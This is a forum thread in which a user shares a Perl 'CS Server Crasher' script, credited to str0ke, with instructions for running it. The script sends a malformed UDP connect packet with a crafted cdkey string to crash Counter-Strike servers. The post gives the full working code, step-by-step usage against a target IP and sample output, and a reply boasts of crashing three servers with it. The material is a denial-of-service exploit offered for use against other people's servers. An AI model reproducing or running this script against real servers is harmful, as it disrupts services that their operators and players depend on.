Jump to content

Recommended Posts

Posted

I know this perl is old but works still fine! And this perl is just edited by me the creator of this perl is str0ke.

 

How to use:

Added New Link*

Download ActivePerl : http://www.activestate.com/activeperl/

 

Copy the exploit and paste it to a notepad then save it as: name.pl.

 

Go to Start, Run type in CMD.

 

Drag the name.pl file to CMD window and don't press enter yet, it should be like this when u drag the exploit to CMD window: C:\csdos.pl. Now type in the server IP and press enter. Example : C:\csdos.pl 85.174.64.218:27016 (press enter). Then it should end like this :

Code:

C:\Documents and Settings\(name)>C:\csdos.pl  85.174.64.218:27016

 

 

#    CS Server Crasher Perl Version (CS server crasher)                

#               Doesn't Work on Steam Servers                                

#           Edited By HackDS5 / Made by str0ke                            

#

A A A A A00000000 999416013 2

 

>A A A A connect 47 999416013 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a36258af1bb64ed

866538c9db76""\"

A A A A A00000000 999416013 2

 

>A A A A connect 47 999416013 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a36258af1bb64ed

866538c9db76""\"

A A A A B 4 "83.255.18.243:4596" 0

 

Or in other types...

 

Here is the Exploit/Perl

 

Code:

#!/usr/bin/perl

 

##                                                                                                          

##CS Server Crasher Perl (CSDoS)                                  

##Doesn't work on Steam Servers and steam must not-      

##-be running                                                            

##Edited by HackDS5                                                  

##Made by str0ke                                                        

##HBTTeam                                                                

 

                                                     

use IO::Socket;

print q{

#

#    CS Server Crasher Perl Version (CS server crasher)                

#        Doesn't Work on Steam Servers                                

#        Edited By HackDS5 / Made by str0ke                            

#

};

 

die "usage: ./csdos <host>" unless $ARGV[0];

$host=$ARGV[0];

 

if (fork())

{       econnect($host); }

else

{ econnect($host); };

exit;

 

sub econnect($)

{

       my $host=$_[0];

       my $sock = new

IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');

       die "Could not create socket: $!\n" unless $sock;

       $cmd="\xff\xff\xff\xff";

       syswrite $sock, $cmd."getchallenge";

 

       sysread $sock,$b,65535;  print $b,"\n";

       @c=split(/ /,$b);

 

       $c2=$c[1];

 

       $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";

print '>',$q,"\n";

syswrite $sock, $q;

sysread $sock,$b,65535; print $b,"\n";

sleep 3;

close $sock;

}

Credits : hackds5

Posted

Great Devangell!!!Thx For Share I Was Searching cs 1.6 crasher(As I Told You)

Its Don't Working At All Servers Probarly They Fix It.

But I Crash 3 Servers And Now I'm Happy ;D

 

+1 Ofc.

Guest
This topic is now closed to further replies.


×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock